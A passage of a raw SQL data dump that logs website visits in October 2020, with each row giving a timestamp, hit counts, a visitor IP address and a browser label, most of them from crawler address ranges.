,'31.13.127.23','other'),(542584,1603088771,1,1,0,0,'31.13.127.113','other'),(542585,1603088784,1,1,0,0,'66.220.149.5','other'),(542586,1603088951,1,1,0,0,'173.252.95.15','other'),(542587,1603089078,1,1,0,0,'94.153.65.211','chrome'),(542588,1603089203,1,1,0,0,'85.140.76.239','chrome'),(542589,1603089272,1,1,0,0,'173.252.95.7','other'),(542590,1603089331,1,1,0,0,'88.155.187.238','chrome'),(542591,1603089469,1,1,0,0,'69.171.251.2','other'),(542592,1603089470,1,1,0,0,'69.171.251.1','other'),(542593,1603089659,1,1,0,0,'91.196.178.114','chrome'),(542594,1603089697,1,1,0,0,'94.153.1.143','chrome'),(542595,1603089738,1,1,0,0,'46.211.37.26','chrome'),(542596,1603090033,1,1,0,0,'37.73.132.36','chrome'),(542597,1603090154,1,1,0,0,'173.252.95.5','other'),(542598,1603090279,1,1,0,0,'94.153.21.146','chrome'),(542599,1603090434,1,1,0,0,'91.196.178.74','chrome'),(542600,1603090995,1,1,0,0,'94.153.10.164','chrome'),(542601,1603091128,1,1,0,0,'31.13.127.117','other'),(542602,1603091236,1,1,0,0,'173.252.95.120','other'),(542603,1603091275,1,1,0,0,'173.252.95.116','other'),(542604,1603091327,1,1,0,0,'173.252.95.22','other'),(542605,1603091338,1,1,0,0,'31.13.127.9','other'),(542606,1603091388,1,1,0,0,'88.155.49.28','other'),(542607,1603091565,1,1,0,0,'173.252.127.5','other'),(542608,1603091566,1,1,0,0,'173.252.127.10','other'),(542609,1603092255,1,1,0,0,'69.171.251.8','other'),(542610,1603092853,1,1,0,0,'31.13.127.119','other'),(542611,1603093393,1,1,0,0,'173.252.95.24','other'),(542612,1603093640,1,1,0,0,'31.13.127.23','other'),(542613,1603094116,1,1,0,0,'69.171.251.22','other'),(542614,1603094179,1,1,0,0,'173.252.127.17','other'),(542615,1603094395,1,1,0,0,'91.196.178.29','chrome'),(542616,1603094820,1,1,0,0,'173.252.95.6','other'),(542617,1603095026,1,1,0,0,'91.196.178.142','chrome'),(542618,1603095301,1,1,0,0,'31.13.127.23','other'),(542619,1603095606,1,1,0,0,'173.252.95.119','other'),(542620,1603095908,1,1,0,0,'37.73.9.238','chrome'),(542621,1603096047,1,1,0,0,'69.171.251.112','other'),(542622,1603096106,1,1,0,0,'173.252.127.10','other'),(542623,1603096458,1,1,0,0,'66.220.149.8','other'),(542624,1603096503,1,1,0,0,'173.252.95.18','other'),(542625,1603097249,1,1,0,0,'69.171.251.8','other'),(542627,1603097388,1,1,0,0,'173.252.95.112','other'),(542628,1603097520,1,1,0,0,'173.252.111.14','other'),(542629,1603097521,1,1,0,0,'173.252.111.10','other'),(542630,1603097641,1,1,0,0,'95.116.27.216','chrome'),(542631,1603098206,1,1,0,0,'31.13.127.1','other'),(542632,1603098471,1,1,0,0,'69.171.251.116','other'),(542633,1603098784,1,1,0,0,'173.252.111.21','other'),(542634,1603099700,1,1,0,0,'173.252.95.14','other'),(542635,1603100039,1,1,0,0,'31.13.127.119','other'),(542636,1603100230,1,1,0,0,'173.252.95.21','other'),(542637,1603100384,1,1,0,0,'173.252.95.22','other'),(542638,1603101099,1,1,0,0,'69.171.251.20','other'),(542639,1603101186,1,1,0,0,'31.13.127.18','other'),(542640,1603101237,1,1,0,0,'66.220.149.9','other'),(542641,1603101305,1,1,0,0,'94.153.6.79','chrome'),(542642,1603101520,1,1,0,0,'31.13.127.2','other'),(542643,1603101621,1,1,0,0,'94.153.228.86','chrome'),(542644,1603101789,1,1,0,0,'173.252.95.17','other'),(542645,1603102646,1,1,0,0,'128.124.133.215','chrome'),(542646,1603102868,2,2,0,0,'91.196.178.29','chrome'),(542647,1603102927,1,1,0,0,'31.13.127.7','other'),(542648,1603102931,1,1,0,0,'31.13.127.21','other'),(542649,1603102932,1,1,0,0,'31.13.127.11','other'),(542650,1603102933,1,1,0,0,'31.13.127.120','other'),(542651,1603102935,1,1,0,0,'66.220.149.13','other'),(542652,1603103092,1,1,0,0,'69.171.251.24','other'),(542653,1603103694,1,1,0,0,'95.134.117.234','chrome'),(542654,1603103788,1,1,0,0,'91.196.178.29','chrome'),(542655,1603103832,1,1,0,0,'31.13.127.119','other'),(542656,1603104514,1,1,0,0,'31.13.127.120','other'),(542657,1603104536,1,1,0,0,'66.220.149.19','other'),(542658,1603104674,1,1,0,0,'173.252.95.116','other'),(542659,1603105893,1,1,0,0,'69.171.251.17','other'),(542660,1603105950,1,1,0,0,'173.252.127.18','other'),(542661,1603105991,1,1,0,0,'31.13.115.113','other'),(542662,1603105999,1,1,0,0,'31.13.127.17','other'),(542663,1603107459,1,1,0,0,'31.13.127.7','other'),(542664,1603107495,1,1,0,0,'66.220.149.4','other'),(542665,1603107807,1,1,0,0,'94.153.80.105','chrome'),(542666,1603108041,1,1,0,0,'31.13.127.4','other'),(542667,1603108464,2,2,0,0,'91.196.178.29','chrome'),(542668,1603108631,1,1,0,0,'173.252.111.1','other'),(542669,1603108632,1,1,0,0,'173.252.111.16','other'),(542670,1603108772,1,1,0,0,'31.13.127.16','other'),(542671,1603109981,1,1,0,0,'91.196.178.25','chrome'),(542672,1603110152,2,2,0,0,'31.13.127.4','other'),(542673,1603110192,1,1,0,0,'173.252.87.5','other'),(542674,1603110193,1,1,0,0,'173.252.87.120','other'),(542675,1603110367,1,1,0,0,'31.13.115.21','other'),(542676,1603110369,2,2,0,0,'31.13.115.13','other'),(542677,1603110376,1,1,0,0,'31.13.115.10','other'),(542678,1603110383,1,1,0,0,'173.252.95.17','other'),(542679,1603110654,1,1,0,0,'66.220.149.37','other'),(542680,1603110773,1,1,0,0,'31.13.127.7','other'),(542681,1603110778,2,2,0,0,'31.13.127.18','other'),(542682,1603110779,1,1,0,0,'31.13.127.10','other'),(542683,1603110780,2,2,0,0,'31.13.127.119','other'),(542685,1603110954,1,1,0,0,'46.211.56.204','chrome'),(542686,1603111074,2,2,0,0,'195.10.210.70','chrome'),(542687,1603111161,1,1,0,0,'91.204.95.51','chrome'),(542688,1603111169,1,1,0,0,'94.153.50.138','chrome'),(542689,1603111251,1,1,0,0,'69.171.251.5','other'),(542690,1603111257,1,1,0,0,'173.252.111.18','other'),(542691,1603111306,1,1,0,0,'95.67.98.76','chrome'),(542692,1603111553,1,1,0,0,'69.171.251.21','other'),(542693,1603111837,1,1,0,0,'91.196.178.146','chrome'),(542695,1603111915,1,1,0,0,'173.252.95.9','other'),(542696,1603111962,1,1,0,0,'173.252.95.112','other'),(542697,1603111989,1,1,0,0,'85.70.71.234','chrome'),(542698,1603112062,1,1,0,0,'46.211.26.104','chrome'),(542699,1603112089,1,1,0,0,'46.211.47.106','chrome'),(542700,1603112198,1,1,0,0,'91.196.178.114','chrome'),(542701,1603112383,1,1,0,0,'66.220.149.34','other'),(542702,1603112486,1,1,0,0,'173.252.95.14','other'),(542703,1603112531,1,1,0,0,'91.196.178.22','chrome'),(542704,1603112554,1,1,0,0,'31.13.127.8','other'),(542705,1603112641,1,1,0,0,'91.196.178.25','chrome'),(542706,1603112673,1,1,0,0,'185.138.229.242','chrome'),(542707,1603112778,1,1,0,0,'31.13.127.17','other'),(542708,1603112794,1,1,0,0,'31.13.103.3','other'),(542709,1603112891,1,1,0,0,'91.196.178.104','chrome'),(542710,1603113182,1,1,0,0,'91.196.178.92','chrome'),(542711,1603113240,1,1,0,0,'195.10.210.210','chrome'),(542712,1603113242,1,1,0,0,'173.252.87.22','other'),(542713,1603113243,1,1,0,0,'173.252.87.118','other'),(542714,1603113272,1,1,0,0,'46.211.3.149','chrome'),(542715,1603113433,1,1,0,0,'66.220.149.111','other'),(542716,1603113580,1,1,0,0,'91.196.178.182','other'),(542717,1603113667,1,1,0,0,'66.220.149.23','other'),(542718,1603113684,1,1,0,0,'173.252.95.117','other'),(542719,1603113783,1,1,0,0,'66.220.149.1','other'),(542720,1603113889,1,1,0,0,'185.237.217.7','chrome'),(542721,1603113945,1,1,0,0,'91.196.178.17','other'),(542722,1603114441,1,1,0,0,'91.196.178.107','other'),(542723,1603114490,1,1,0,0,'46.133.45.197','chrome'),(542724,1603114635,1,1,0,0,'173.252.95.120','other'),(542725,1603114637,1,1,0,0,'37.73.181.179','chrome'),(542726,1603114731,1,1,0,0,'178.166.33.211','chrome'),(542727,1603114910,1,1,0,0,'46.211.38.23','chrome'),(542728,1603114937,1,1,0,0,'94.153.48.50','chrome'),(542729,1603115055,1,1,0,0,'91.196.178.29','chrome'),(542730,1603115165,1,1,0,0,'91.196.178.17','other'),(542731,1603115549,1,1,0,0,'46.211.12.227','chrome'),(542732,1603116370,1,1,0,0,'173.252.95.26','other'),(542733,1603116422,1,1,0,0,'91.196.178.25','chrome'),(542734,1603116439,1,1,0,0,'173.252.87.19','other'),(542735,1603116440,1,1,0,0,'173.252.87.117','other'),(542736,1603116578,1,1,0,0,'173.252.95.120','other'),(542737,1603116852,1,1,0,0,'94.153.20.37','chrome'),(542738,1603116882,1,1,0,0,'46.211.8.199','chrome'),(542739,1603117415,1,1,0,0,'37.73.131.205','chrome'),(542740,1603117822,1,1,0,0,'173.252.87.19','other'),(542741,1603117823,1,1,0,0,'173.252.87.17','other'),(542742,1603118035,1,1,0,0,'31.13.127.6','other'),(542743,1603118058,1,1,0,0,'69.171.251.119','other'),(542744,1603118598,1,1,0,0,'173.252.95.22','other'),(542745,1603118907,1,1,0,0,'31.13.127.23','other'),(542746,1603119004,1,1,0,0,'173.252.95.16','other'),(542747,1603119023,1,1,0,0,'173.252.95.30','other'),(542748,1603119038,1,1,0,0,'66.220.149.25','other'),(542749,1603119761,1,1,0,0,'5.40.179.2','chrome'),(542750,1603119793,1,1,0,0,'91.196.178.107','chrome'),(542751,1603119795,1,1,0,0,'173.252.95.22','other'),(542752,1603119914,1,1,0,0,'31.13.127.3','other'),(542753,1603120229,1,1,0,0,'173.252.87.120','other'),(542754,1603120230,1,1,0,0,'173.252.87.8','other'),(542755,1603120737,1,1,0,0,'31.13.127.4','other'),(542756,1603120881,1,1,0,0,'91.196.178.29','chrome'),(542757,1603121093,1,1,0,0,'173.252.95.118','other'),(542758,1603121636,1,1,0,0,'173.252.87.117','other'),(542759,1603122045,1,1,0,0,'91.196.178.53','chrome'),(542760,1603122775,1,1,0,0,'37.55.56.24','chrome'),(542761,1603122849,1,1,0,0,'31.13.127.2','other'),(542762,1603123129,1,1,0,0,'88.155.143.144','chrome'),(542763,1603123202,1,1,0,0,'31.13.127.18','other'),(542764,1603123705,1,1,0,0,'31.13.127.20','other'),(542765,1603123980,1,1,0,0,'69.171.251.17','other'),(542766,1603124244,1,1,0,0,'69.171.251.35','other'),(542767,1603124245,1,1,0,0,'173.252.127.30','other'),(542769,1603124822,1,1,0,0,'173.252.95.15','other'),(542770,1603125136,1,1,0,0,'173.252.95.118','other'),(542771,1603125192,1,1,0,0,'91.196.178.161','chrome'),(542772,1603126004,1,1,0,0,'31.13.127.20','other'),(542774,1603126005,2,2,0,0,'31.13.127.7','other'),(542777,1603126279,1,1,0,0,'31.13.127.6','other'),(542778,1603126497,1,1,0,0,'46.133.241.217','chrome'),(542779,1603126982,1,1,0,0,'31.13.127.7','other'),(542780,1603127425,1,1,0,0,'173.252.127.34','other'),(542781,1603127813,1,1,0,0,'31.13.127.16','other'),(542782,1603127873,1,1,0,0,'37.73.147.224','chrome'),(542783,1603128147,1,1,0,0,'173.252.95.3','other'),(542784,1603128171,1,1,0,0,'173.252.127.25','other'),(542785,1603128283,1,1,0,0,'69.171.251.20','other'),(542786,1603128356,1,1,0,0,'185.237.217.19','chrome'),(542787,1603128517,1,1,0,0,'93.170.117.25','other'),(542788,1603128900,1,1,0,0,'37.55.59.88','chrome'),(542789,1603128939,1,1,0,0,'173.252.111.23','other'),(542790,1603129018,1,1,0,0,'91.196.178.22','chrome'),(542791,1603129157,1,1,0,0,'91.196.178.178','chrome'),(542792,1603129728,1,1,0,0,'173.252.95.5','other'),(542793,1603130055,1,1,0,0,'173.252.95.118','other'),(542794,1603130259,1,1,0,0,'69.171.251.15','other'),(542795,1603130505,1,1,0,0,'31.13.127.3','other'),(542796,1603130524,4,4,0,0,'128.124.236.219','firefox'),(542797,1603130782,1,1,0,0,'173.252.111.20','other'),(542798,1603130783,1,1,0,0,'173.252.111.13','other'),(542799,1603130784,1,1,0,0,'173.252.111.9','other'),(542800,1603130790,1,1,0,0,'66.220.149.4','other'),(542801,1603130792,1,1,0,0,'173.252.107.19','other'),(542803,1603130793,1,1,0,0,'69.171.251.112','other'),(542804,1603130802,1,1,0,0,'173.252.111.2','other'),(542805,1603130804,1,1,0,0,'173.252.111.12','other'),(542806,1603130805,1,1,0,0,'173.252.111.111','other'),(542807,1603130862,1,1,0,0,'66.220.149.18','other'),(542808,1603130869,1,1,0,0,'69.171.251.18','other'),(542809,1603130878,1,1,0,0,'173.252.95.30','other'),(542810,1603130928,2,2,0,0,'31.13.127.112','other'),(542812,1603130929,1,1,0,0,'173.252.111.112','other'),(542813,1603130935,1,1,0,0,'69.171.251.27','other'),(542814,1603130937,1,1,0,0,'31.13.115.3','other'),(542815,1603130939,1,1,0,0,'173.252.127.14','other'),(542816,1603130956,1,1,0,0,'173.252.111.22','other'),(542818,1603130987,2,2,0,0,'66.220.149.111','other'),(542819,1603131003,1,1,0,0,'173.252.95.119','other'),(542820,1603131090,1,1,0,0,'69.171.251.13','other'),(542821,1603131107,1,1,0,0,'69.171.251.6','other'),(542822,1603131590,1,1,0,0,'91.196.178.177','other'),(542823,1603131768,1,1,0,0,'69.171.251.14','other'),(542824,1603131868,2,2,0,0,'173.252.95.12','other'),(542825,1603132031,1,1,0,0,'91.196.178.20','chrome'),(542826,1603132164,1,1,0,0,'31.13.127.117','other'),(542827,1603132219,1,1,0,0,'69.171.251.112','other'),(542828,1603132220,1,1,0,0,'69.171.251.120','other'),(542829,1603132694,1,1,0,0,'173.252.87.16','other'),(542830,1603132733,1,1,0,0,'173.252.111.5','other'),(542831,1603132898,1,1,0,0,'173.252.95.29','other'),(542832,1603133113,1,1,0,0,'66.220.149.10','other'),(542833,1603133119,1,1,0,0,'195.10.210.70','chrome'),(542834,1603133138,1,1,0,0,'91.196.178.142','chrome'),(542835,1603133155,1,1,0,0,'69.171.251.112','other'),(542836,1603133220,1,1,0,0,'173.252.95.15','other'),(542837,1603133257,1,1,0,0,'31.13.127.118','other'),(542838,1603133379,1,1,0,0,'173.252.95.21','other'),(542839,1603133631,1,1,0,0,'173.252.95.116','other'),(542840,1603133732,1,1,0,0,'91.196.178.109','chrome'),(542841,1603133957,1,1,0,0,'91.196.178.25','chrome'),(542842,1603133979,1,1,0,0,'66.220.149.25','other'),(542843,1603133980,1,1,0,0,'69.171.251.35','other'),(542844,1603134084,1,1,0,0,'31.13.127.3','other'),(542845,1603134224,1,1,0,0,'195.10.210.210','other'),(542846,1603134294,1,1,0,0,'173.252.95.11','other'),(542847,1603134367,1,1,0,0,'31.13.127.119','other'),(542848,1603134411,1,1,0,0,'88.155.120.57','chrome'),(542849,1603134432,1,1,0,0,'173.252.111.22','other'),(542850,1603134518,1,1,0,0,'66.220.149.22','other'),(542851,1603134545,1,1,0,0,'94.153.17.245','chrome'),(542852,1603134614,1,1,0,0,'173.252.95.14','other'),(542853,1603134785,1,1,0,0,'173.252.95.112','other'),(542854,1603135112,1,1,0,0,'66.220.149.21','other'),(542855,1603135143,1,1,0,0,'185.237.217.10','chrome'),(542856,1603135178,1,1,0,0,'31.13.127.117','other'),(542857,1603135427,1,1,0,0,'173.252.111.118','other'),(542858,1603135506,1,1,0,0,'173.252.95.30','other'),(542859,1603135537,1,1,0,0,'173.252.127.9','other'),(542860,1603135538,1,1,0,0,'66.220.149.12','other'),(542861,1603135898,1,1,0,0,'31.13.127.120','other'),(542862,1603136287,1,1,0,0,'69.171.251.117','other'),(542863,1603136292,1,1,0,0,'173.252.127.17','other'),(542864,1603136304,1,1,0,0,'173.252.95.19','other'),(542865,1603136555,1,1,0,0,'69.171.251.111','other'),(542866,1603136595,1,1,0,0,'91.196.178.61','chrome'),(542867,1603136616,1,1,0,0,'66.220.149.119','other'),(542868,1603136617,1,1,0,0,'66.220.149.12','other'),(542869,1603136807,2,2,0,0,'178.133.68.127','firefox'),(542870,1603136831,1,1,0,0,'91.196.178.104','chrome'),(542871,1603136920,1,1,0,0,'69.171.251.35','other'),(542872,1603136930,1,1,0,0,'66.220.149.22','other'),(542873,1603137333,1,1,0,0,'91.196.178.25','chrome'),(542874,1603137400,1,1,0,0,'31.13.127.18','other'),(542875,1603137452,1,1,0,0,'173.252.111.117','other'),(542876,1603137705,1,1,0,0,'31.13.127.24','other'),(542877,1603137981,1,1,0,0,'173.252.95.23','other'),(542878,1603138495,1,1,0,0,'69.171.251.14','other'),(542879,1603138605,1,1,0,0,'31.13.127.112','other'),(542880,1603139073,1,1,0,0,'37.73.212.160','chrome'),(542881,1603139458,1,1,0,0,'69.171.251.11','other'),(542882,1603139485,1,1,0,0,'31.13.127.120','other'),(542883,1603139625,1,1,0,0,'31.13.127.10','other'),(542884,1603139835,1,1,0,0,'173.252.127.120','other'),(542885,1603140110,1,1,0,0,'173.252.95.10','other'),(542886,1603140320,1,1,0,0,'173.252.95.32','other'),(542887,1603140502,1,1,0,0,'31.13.127.9','other'),(542888,1603141668,1,1,0,0,'69.171.251.116','other'),(542889,1603141669,1,1,0,0,'66.220.149.6','other'),(542890,1603141735,1,1,0,0,'31.13.127.4','other'),(542891,1603141815,1,1,0,0,'66.220.149.113','other'),(542892,1603141824,1,1,0,0,'91.196.178.152','chrome'),(542893,1603142043,1,1,0,0,'173.252.95.28','other'),(542894,1603142970,1,1,0,0,'173.252.95.9','other'),(542895,1603143206,1,1,0,0,'91.196.178.21','other'),(542896,1603143844,1,1,0,0,'69.171.251.4','other'),(542897,1603143859,1,1,0,0,'66.220.149.34','other'),(542898,1603144785,1,1,0,0,'173.252.95.2','other'),(542899,1603144878,1,0,1,0,'66.249.66.92',''),(542900,1603144956,1,1,0,0,'173.252.127.111','other'),(542901,1603145489,1,1,0,0,'66.220.149.32','other'),(542902,1603145500,1,1,0,0,'69.171.251.31','other'),(542903,1603145849,1,1,0,0,'31.13.127.120','other'),(542904,1603146583,1,1,0,0,'173.252.95.1','other'),(542905,1603146914,1,1,0,0,'173.252.95.119','other'),(542906,1603151894,1,1,0,0,'173.252.127.31','other'),(542907,1603153034,1,1,0,0,'91.196.178.153','other'),(542908,1603153299,1,1,0,0,'173.252.95.11','other'),(542909,1603153300,1,1,0,0,'173.252.95.5','other'),(542910,1603153589,1,1,0,0,'173.252.87.26','other'),(542911,1603153742,1,1,0,0,'31.13.115.24','other'),(542912,1603157552,1,1,0,0,'91.196.178.42','chrome'),(542913,1603163350,1,1,0,0,'31.13.103.20','other'),(542914,1603164594,1,1,0,0,'130.180.217.235','chrome'),(542915,1603164639,1,1,0,0,'5.255.253.92','other'),(542916,1603164884,1,1,0,0,'130.180.216.7','chrome'),(542917,1603165568,1,1,0,0,'69.171.251.25','other'),(542918,1603165647,1,1,0,0,'173.252.87.26','other'),(542919,1603165905,1,1,0,0,'173.252.95.7','other'),(542920,1603167031,1,1,0,0,'31.13.127.8','other'),(542921,1603167182,1,1,0,0,'173.252.95.12','other'),(542922,1603168237,1,1,0,0,'91.214.85.153','other'),(542923,1603168291,1,1,0,0,'173.252.87.23','other'),(542924,1603168292,1,1,0,0,'173.252.107.6','other'),(542926,1603168672,1,1,0,0,'173.252.87.24','other'),(542927,1603168813,1,1,0,0,'69.171.251.2','other'),(542928,1603168832,1,1,0,0,'66.220.149.29','other'),(542929,1603169246,1,1,0,0,'31.13.127.112','other'),(542930,1603172705,1,1,0,0,'173.252.95.24','other'),(542931,1603173474,1,1,0,0,'31.13.127.19','other'),(542932,1603173862,1,1,0,0,'69.171.251.13','other'),(542934,1603174385,1,1,0,0,'173.252.95.13','other'),(542935,1603175306,1,1,0,0,'128.124.12.109','chrome'),(542936,1603175409,1,1,0,0,'31.13.127.3','other'),(542937,1603175787,1,1,0,0,'91.196.178.184','chrome'),(542938,1603175939,1,1,0,0,'173.252.95.10','other'),(542939,1603175945,1,1,0,0,'88.155.36.248','chrome'),(542940,1603176014,1,1,0,0,'69.171.251.24','other'),(542941,1603176351,1,1,0,0,'94.153.70.149','chrome'),(542942,1603176616,1,1,0,0,'31.13.127.113','other'),(542943,1603177210,1,1,0,0,'173.252.111.23','other'),(542944,1603177511,1,1,0,0,'173.252.95.113','other'),(542945,1603177558,1,1,0,0,'66.220.149.31','other'),(542946,1603178878,1,1,0,0,'173.252.95.23','other'),(542947,1603178936,1,1,0,0,'173.252.87.119','other'),(542948,1603179249,1,1,0,0,'94.153.73.228','chrome'),(542949,1603179394,1,1,0,0,'31.13.127.15','other'),(542950,1603180032,1,1,0,0,'173.252.95.14','other'),(542951,1603180173,1,1,0,0,'91.196.178.74','chrome'),(542952,1603180185,1,1,0,0,'173.252.127.14','other'),(542953,1603180353,1,1,0,0,'46.211.82.132','chrome'),(542954,1603180560,1,1,0,0,'173.252.95.20','other'),(542955,1603180561,1,1,0,0,'31.13.127.120','other'),(542956,1603181118,1,1,0,0,'31.13.127.118','other'),(542957,1603181916,1,1,0,0,'173.252.95.20','other'),(542958,1603182011,1,1,0,0,'173.252.95.8','other'),(542959,1603182176,1,1,0,0,'173.252.95.21','other'),(542960,1603182188,2,2,0,0,'31.13.127.2','other'),(542961,1603182204,1,1,0,0,'91.196.178.177','chrome'),(542962,1603182764,1,1,0,0,'94.153.71.61','chrome'),(542963,1603182765,1,1,0,0,'173.252.127.14','other'),(542964,1603183008,1,1,0,0,'66.220.149.20','other'),(542965,1603183011,1,1,0,0,'69.171.251.11','other'),(542966,1603183554,1,1,0,0,'31.13.127.17','other'),(542967,1603183923,1,1,0,0,'173.252.95.19','other'),(542968,1603184411,1,1,0,0,'173.252.95.118','other'),(542969,1603184609,1,1,0,0,'173.252.95.3','other'),(542970,1603185647,1,1,0,0,'173.252.95.6','other'),(542971,1603186011,1,1,0,0,'69.171.251.6','other'),(542972,1603186156,1,1,0,0,'173.252.95.7','other'),(542973,1603186436,1,1,0,0,'62.80.164.24','chrome'),(542974,1603186537,2,2,0,0,'31.13.127.12','other'),(542975,1603186730,1,1,0,0,'66.220.149.112','other'),(542976,1603187290,1,1,0,0,'69.171.251.13','other'),(542977,1603187338,1,1,0,0,'173.252.95.20','other'),(542978,1603187656,1,1,0,0,'66.220.149.9','other'),(542980,1603187657,1,1,0,0,'66.220.149.11','other'),(542981,1603187827,1,1,0,0,'66.220.149.22','other'),(542982,1603187841,1,1,0,0,'95.135.90.9','chrome'),(542983,1603188257,1,1,0,0,'46.211.22.78','chrome'),(542984,1603191296,1,1,0,0,'173.252.95.111','other'),(542985,1603191632,1,1,0,0,'66.220.149.11','other'),(542986,1603191731,1,1,0,0,'173.252.95.6','other'),(542987,1603191972,1,1,0,0,'91.196.178.175','chrome'),(542988,1603192914,1,1,0,0,'173.252.95.14','other'),(542989,1603193581,1,1,0,0,'88.155.60.26','chrome'),(542990,1603193661,1,1,0,0,'5.255.253.92','other'),(542991,1603194289,1,1,0,0,'31.13.127.11','other'),(542992,1603194381,1,1,0,0,'93.76.19.77','chrome'),(542993,1603194621,1,1,0,0,'66.220.149.22','other'),(542994,1603195223,1,1,0,0,'31.13.127.112','other'),(542995,1603195620,1,1,0,0,'66.220.149.118','other'),(542996,1603196263,1,1,0,0,'173.252.95.4','other'),(542997,1603196530,1,1,0,0,'173.252.95.12','other'),(542998,1603197511,1,1,0,0,'91.196.178.19','chrome'),(542999,1603197571,1,1,0,0,'31.13.127.18','other'),(543000,1603197574,1,1,0,0,'173.252.95.21','other'),(543001,1603197615,1,1,0,0,'173.252.95.22','other'),(543002,1603197917,1,1,0,0,'95.135.90.9','chrome'),(543003,1603198615,1,1,0,0,'173.252.95.11','other'),(543004,1603198616,1,1,0,0,'31.13.127.8','other'),(543005,1603199202,1,1,0,0,'173.252.95.17','other'),(543006,1603199386,1,1,0,0,'173.252.83.112','other'),(543007,1603199387,1,1,0,0,'173.252.83.2','other'),(543008,1603199388,1,1,0,0,'173.252.83.4','other'),(543009,1603199657,1,1,0,0,'66.220.149.21','other'),(543010,1603201233,1,1,0,0,'31.13.127.117','other'),(543011,1603201381,1,1,0,0,'69.171.251.34','other'),(543012,1603202626,1,1,0,0,'173.252.95.1','other'),(543013,1603203145,1,1,0,0,'31.13.127.11','other'),(543014,1603203605,1,1,0,0,'173.252.87.112','other'),(543015,1603204712,1,1,0,0,'31.13.127.8','other'),(543016,1603204726,1,1,0,0,'69.171.251.8','other'),(543017,1603205171,1,1,0,0,'173.252.95.7','other'),(543018,1603205609,1,1,0,0,'31.13.127.4','other'),(543019,1603205890,2,2,0,0,'5.255.253.92','other'),(543020,1603206050,1,1,0,0,'91.196.178.132','chrome'),(543021,1603206135,1,1,0,0,'173.252.95.17','other'),(543022,1603206194,1,1,0,0,'93.74.163.237','chrome'),(543023,1603206277,1,1,0,0,'91.196.178.23','other'),(543024,1603206617,1,1,0,0,'173.252.95.9','other'),(543025,1603206618,1,1,0,0,'31.13.127.4','other'),(543026,1603206962,1,1,0,0,'91.196.178.186','chrome'),(543027,1603208021,1,1,0,0,'31.13.127.15','other'),(543028,1603208846,1,1,0,0,'91.196.178.138','chrome'),(543029,1603208916,1,1,0,0,'31.13.127.13','other'),(543030,1603209443,1,1,0,0,'173.252.95.18','other'),(543031,1603209661,1,1,0,0,'176.37.112.73','chrome'),(543032,1603209841,1,1,0,0,'31.13.127.24','other'),(543033,1603209842,1,1,0,0,'31.13.127.7','other'),(543034,1603210648,1,1,0,0,'173.252.127.119','other'),(543035,1603211099,1,1,0,0,'195.10.210.210','chrome'),(543036,1603211127,1,1,0,0,'173.252.95.118','other'),(543037,1603211288,1,1,0,0,'173.252.87.19','other'),(543038,1603211667,1,1,0,0,'31.13.127.16','other'),(543039,1603211668,1,1,0,0,'69.171.251.9','other'),(543040,1603211832,1,1,0,0,'46.211.78.125','chrome'),(543041,1603212843,1,1,0,0,'69.171.251.19','other'),(543042,1603213115,1,1,0,0,'93.170.117.25','other'),(543043,1603213304,1,1,0,0,'195.10.210.210','chrome'),(543044,1603213383,1,1,0,0,'46.201.175.130','chrome'),(543045,1603213469,2,2,0,0,'91.196.178.25','chrome'),(543046,1603213537,1,1,0,0,'91.196.178.84','chrome'),(543047,1603213542,1,1,0,0,'31.13.127.16','other'),(543048,1603213706,1,1,0,0,'173.252.95.119','other'),(543049,1603214042,1,1,0,0,'66.220.149.26','other'),(543050,1603214066,1,1,0,0,'46.211.71.122','other'),(543051,1603214201,1,1,0,0,'173.252.95.20','other'),(543052,1603214674,1,1,0,0,'173.252.95.27','other'),(543053,1603216007,1,1,0,0,'31.13.127.120','other'),(543054,1603216576,2,2,0,0,'31.13.127.4','other'),(543055,1603217065,1,1,0,0,'173.252.111.9','other'),(543056,1603217445,1,1,0,0,'31.13.127.112','other'),(543057,1603217456,1,1,0,0,'66.220.149.37','other'),(543058,1603217486,2,2,0,0,'66.220.149.15','other'),(543059,1603217487,1,1,0,0,'69.171.251.23','other'),(543060,1603218194,1,1,0,0,'31.13.127.23','other'),(543061,1603218526,1,1,0,0,'31.13.127.6','other'),(543062,1603218672,1,1,0,0,'31.13.127.24','other'),(543063,1603219381,1,1,0,0,'66.220.149.19','other'),(543064,1603219490,1,1,0,0,'31.13.127.9','other'),(543065,1603220148,1,1,0,0,'69.171.251.34','other'),(543066,1603220625,1,1,0,0,'173.252.87.3','other'),(543068,1603220782,1,1,0,0,'173.252.95.12','other'),(543069,1603221372,1,1,0,0,'31.13.127.5','other'),(543070,1603221459,1,1,0,0,'173.252.95.13','other'),(543071,1603221711,1,1,0,0,'178.121.33.30','chrome'),(543072,1603221874,1,1,0,0,'31.13.127.10','other'),(543073,1603222116,1,1,0,0,'31.13.115.12','other'),(543074,1603222227,1,1,0,0,'46.211.38.90','other'),(543075,1603222282,1,1,0,0,'173.252.95.32','other'),(543076,1603222340,1,1,0,0,'66.220.149.40','other'),(543077,1603222545,1,1,0,0,'173.252.95.27','other'),(543078,1603222874,1,1,0,0,'173.252.95.33','other'),(543079,1603223082,1,1,0,0,'31.13.127.17','other'),(543080,1603223156,1,1,0,0,'91.196.177.69','chrome'),(543081,1603223416,1,1,0,0,'173.252.95.113','other'),(543082,1603224673,1,1,0,0,'31.13.127.6','other'),(543083,1603225961,2,2,0,0,'91.196.178.25','chrome'),(543084,1603225974,1,1,0,0,'31.13.127.24','other'),(543085,1603225975,1,1,0,0,'31.13.127.4','other'),(543086,1603225979,1,1,0,0,'31.13.127.10','other'),(543087,1603225982,2,2,0,0,'31.13.127.5','other'),(543088,1603225983,1,1,0,0,'31.13.127.6','other'),(543089,1603226034,1,1,0,0,'66.220.149.13','other'),(543090,1603226374,1,1,0,0,'185.237.217.15','chrome'),(543091,1603226518,1,1,0,0,'159.224.216.39','other'),(543092,1603226674,1,1,0,0,'173.252.95.22','other'),(543093,1603227019,1,1,0,0,'173.252.95.27','other'),(543094,1603227177,1,1,0,0,'31.13.127.6','other'),(543095,1603227433,1,1,0,0,'46.202.169.120','chrome'),(543096,1603227537,1,1,0,0,'91.196.178.132','chrome'),(543097,1603227843,1,1,0,0,'69.171.251.18','other'),(543098,1603228627,1,1,0,0,'69.171.251.32','other'),(543099,1603229645,2,2,0,0,'66.249.66.91','chrome'),(543100,1603229663,1,1,0,0,'66.249.66.92','chrome'),(543101,1603230875,1,0,1,0,'66.249.66.91',''),(543102,1603231343,1,1,0,0,'31.13.127.15','other'),(543103,1603231347,1,1,0,0,'173.252.95.14','other'),(543104,1603231763,1,1,0,0,'173.252.95.23','other'),(543105,1603232122,1,1,0,0,'173.252.127.6','other'),(543106,1603234156,1,1,0,0,'3